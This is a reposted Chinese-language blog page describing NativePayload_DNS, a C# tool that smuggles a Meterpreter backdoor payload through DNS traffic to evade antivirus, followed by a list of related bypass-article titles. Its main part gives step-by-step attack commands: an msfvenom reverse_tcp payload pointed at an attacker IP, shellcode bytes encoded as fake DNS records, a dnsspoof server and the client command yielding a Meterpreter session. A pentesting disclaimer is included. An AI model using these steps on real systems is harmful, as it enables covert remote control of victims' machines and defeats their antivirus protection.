NativePayload_DNS,通過DNS流量,繞過防病毒傳輸後門
版權宣告:轉載請註明出處:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396319
注意標點符號,必須是英文的。
通過DNS流量和繞過防病毒傳輸的後門有效負載的C#程式碼
由Damon Mohammadbagher發表
警告:此程式碼釋出用於解釋針對Pentesters和安全研究人員的反病毒漏洞
欲瞭解更多資訊,請一步一步訪問以下連結:
通過DNS流量繞過帶有傳輸後門有效負載的反病毒或文章備份地址
視訊由Damon Mohammadbagher發行(bbxc9x00x1f)
繞過反病毒與DNS流量傳輸後門有效負載視訊(需要訪問YouTube)
用NativePayload_DNS和Meterpreter_Payload_Detection繞過AV視訊(需要訪問YouTube)
視訊說明:使用NativePayload_DNS.exe繞過AV並通過Meterpreter_Payload_Detection工具檢測Meterpreter程式
步驟1:
msfvenom C型別的有效負載在你的kali linux
msfvenom --platform windows -arch x86_64 -p windows/x64 /meterpreter/reverse_tcp lhost = 192.168.1.50 -fc> /root/Desktop/payload.txt
將有效載荷從payload.txt檔案複製到dns.txt,格式如下:
root @ kali:〜#cat /root/Desktop/dns.txt
1.1.1.0“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com”
1.1.1.1“0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com”
1.1.1.2“0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com”
1.1.1.3“0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com”
步驟2:在您的kali linux中製作假DNS伺服器
root @ kali:〜#dnsspoof -i eth0 -f /root/Desktop/dns.txt
步驟3:
在客戶端執行程式碼
語法:
NativePayload_DNS.exe“1.1.1”. 34“192.168.1.50”
最後你可以繞過AV,你有Meterpreter Session
欲瞭解更多資訊,請一步一步訪問以下連結:
通過DNS流量繞過帶有傳輸後門有效負載的反病毒
相關工具: 用於通過IPv6地址(AAAA)記錄和DNS流量傳輸的Backdoor Payload的C#程式碼也繞過防病毒
相關連結: 用C#通過加密有效載荷繞過所有防病毒
相關文章
- 12、利用 DNS 隧道傳遞資料和命令來繞過防火牆DNS防火牆
- 檔案上傳之後端黑白名單繞過後端
- js繞過-前端加密繞過JS前端加密
- 中轉Webshell繞過流量檢測防護Webshell
- .Net 下通過快取提高TCP傳輸速度快取TCP
- 通過Java傳送Email ,簡單入門。JavaAI
- 運用DNS繞過安全裝置的Oday.DNS
- 檔案上傳漏洞(繞過姿勢)
- 使用tcpdump觀察DNS通訊過程TCPDNS
- sql注入waf繞過簡單入門SQL
- 後門病毒通過下載站傳播 全面劫持各大主流瀏覽器瀏覽器
- 文字檔案上傳漏洞[任意.繞過.解析]
- 遠端下載上傳命令(繞過大小限制)
- lora模組是怎麼提過廣播傳輸通訊?
- 如何繞過強制門戶——克隆 MAC 地址Mac
- 克隆 MAC 地址來繞過強制門戶Mac
- 通過ajax上傳excelExcel
- 網站漏洞檢測解析繞過上傳漏洞網站
- Qt通過Http上傳檔案(路過)QTHTTP
- Vue父子元件通過prop非同步傳輸資料踩坑Vue元件非同步
- 通過RMAN-transport獲取傳輸表空間檔案
- Windows ICMP DNS隧道是一種利用ICMP和DNS協議進行網路隧道傳輸的技術。它透過將資料包封裝在ICMP或DNS報文中,繞過防火牆和其他安全裝置,實現在受限網路之間傳輸資料的方法。WindowsDNS協議封裝防火牆
- 使用HTTP頭進行403繞過 速率繞過 Rate Limit BypassHTTPMIT
- liunx通過TCP傳送資訊TCP
- SpringCloud 通過feign檔案傳輸並打zip包下載SpringGCCloud
- oracle小知識點12--傳輸表空間通過rmanOracle
- md5繞過
- Delphi 通過IdHTTP 傳送Http請求到Java 後臺HTTPJava
- linux下遠端傳送檔案命令,通過ssh協議傳輸檔案Linux協議
- base64碼通過http傳輸 +號變 空格 問題解決HTTP
- oracle小知識點11--傳輸表空間通過impdp/expdpOracle
- 檔案上傳之WAF繞過及相安全防護
- 【檔案上傳繞過】路徑拼接問題導致上傳漏洞
- 通過PowerShell傳送TCP請求TCP
- powershell程式碼混淆繞過
- sqlmap常用繞過指令碼SQL指令碼
- Sql注入之WAF繞過SQL
- jQuery與後臺語言通過json格式傳遞資料jQueryJSON